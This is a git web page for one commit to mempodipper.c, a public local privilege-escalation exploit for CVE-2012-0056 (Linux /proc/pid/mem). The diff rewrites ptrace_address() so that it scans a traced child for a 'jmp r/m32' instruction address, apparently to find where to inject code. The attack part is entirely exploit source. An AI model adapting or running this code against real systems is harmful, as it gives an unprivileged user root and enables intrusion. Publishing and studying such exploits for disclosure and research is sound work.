diff options
author | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-24 17:38:32 +0100 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2012-01-24 18:12:08 +0100 |
commit | 513018e62ef0ef9a309299e1a7dcc0c0c3eb1b7d (patch) | |
tree | 8d22ee73ab5d88ec5fae5b661b3795cb95eb870b /mempodipper.c | |
parent | Not always exit@plt (diff) | |
download | CVE-2012-0056-513018e62ef0ef9a309299e1a7dcc0c0c3eb1b7d.tar.xz CVE-2012-0056-513018e62ef0ef9a309299e1a7dcc0c0c3eb1b7d.zip |
Search for IP of next jmp instead.
Diffstat (limited to 'mempodipper.c')
-rw-r--r-- | mempodipper.c | 10 |
1 files changed, 3 insertions, 7 deletions
diff --git a/mempodipper.c b/mempodipper.c index dcc037c..e35d62a 100644 --- a/mempodipper.c +++ b/mempodipper.c @@ -17,7 +17,6 @@ #define _LARGEFILE64_SOURCE #include <stdio.h> -#include <stdint.h> #include <string.h> #include <stdlib.h> #include <sys/types.h> @@ -126,12 +125,9 @@ unsigned long ptrace_address() #error "That platform is not supported." #endif if (instruction_pointer < upper_bound) { - uint32_t instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL); - int operator = instruction & 0xFF; - if (operator == 0xe8 /* call */) { - int32_t offset = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer + 1, NULL) + 5; - return instruction_pointer + offset; - } + unsigned long instruction = ptrace(PTRACE_PEEKTEXT, child, instruction_pointer, NULL); + if ((instruction & 0xffff) == 0x25ff /* jmp r/m32 */) + return instruction_pointer; } } } else { |